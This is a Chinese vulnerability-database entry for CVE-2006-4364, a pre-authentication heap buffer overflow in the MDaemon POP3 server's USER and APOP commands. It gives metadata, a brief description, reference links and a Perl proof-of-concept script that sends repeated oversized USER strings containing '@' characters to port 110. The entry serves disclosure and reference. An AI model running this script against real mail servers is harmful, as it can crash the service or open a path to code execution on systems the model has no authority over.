MDaemon POP3服务器USER和APOP命令缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110879 漏洞类型 缓冲区溢出
发布时间 2006-08-22 更新时间 2006-08-28
CVE编号 CVE-2006-4364 CNNVD-ID CNNVD-200608-441
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/2245
https://cxsecurity.com/issue/WLB-2006080155
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-441
|漏洞详情
Alt-NMDaemon是一款基于Windows的邮件服务程序。MDaemonPOP3服务器在处理USER和APOP命令时存在缓冲区溢出漏洞。如果向USER或APOP命令发送了包含有"@"字符的超长字符串的话,就会触发这个漏洞,导致堆溢出。如果要利用这个漏洞,必须向POP3服务器发送多个USER命令。成功利用这个漏洞的攻击者可能会执行任意代码,具体取决于堆的状态及字符串的长度。
|漏洞EXP
#
# PoC for Mdaemon POP3 preauth heap overflow
#
# Coded by Leon Juranic <leon.juranic@infigo.hr>
# Infigo IS <http://www.infigo.hr>
# 
#

$host = '192.168.0.105';

use IO::Socket;

for ($x = 0 ; $x < 12 ; $x++)
{
	$sock = new IO::Socket::INET (PeerAddr => $host,PeerPort => '110', Proto => 'tcp') 
	|| die "socket error\n\n";
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock "USER " . "\@A" x 160 . "\r\n";
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock "QUIT\r\n";
	recv ($sock, $var, 10000,0);
	print $var;
	close ($sock);
	sleep(1);
}
	$sock = new IO::Socket::INET (PeerAddr => $host,PeerPort => '110', Proto => 'tcp') 
	|| die "socket error\n\n";
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock "USER " . "\@A\@A" . "B" x 326 . "\r\n";
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock "USER " . "\'A" x  337 . "\r\n";
	recv ($sock, $var, 10000,0);
	print $var;
	sleep(2);

# milw0rm.com [2006-08-22]
|参考资料

来源:SECUNIA
名称:21595
链接:http://secunia.com/advisories/21595
来源:XF
名称:mdaemon-pop3-bo(28517)
链接:http://xforce.iss.net/xforce/xfdb/28517
来源:BID
名称:19651
链接:http://www.securityfocus.com/bid/19651
来源:BUGTRAQ
名称:20060822MDaemonPOP3serverremotebufferoverflow(preauth)
链接:http://www.securityfocus.com/archive/1/archive/1/444015/100/0/threaded
来源:MILW0RM
名称:2245
链接:http://www.milw0rm.com/exploits/2245
来源:MISC
链接:http://www.infigo.hr/en/in_focus/advisories/INFIGO-2006-08-04
来源:SECTRACK
名称:1016729
链接:http://securitytracker.com/id?1016729
来源:files.altn.com
链接:http://files.altn.com/MDaemon/Release/RelNotes_en.txt
来源:OSVDB
名称:28125
链接:http://www.osvdb.org/28125
来源:VUPEN
名称:ADV-2006-3361
链接:http://www.frsirt.com/english/advisories/2006/3361
来源:SREASON
名称:1446
链接:http://securityreason.com/securityalert/1446
来源:MILW0RM
名称:2245
链接:http://milw0rm.com/exploits/2245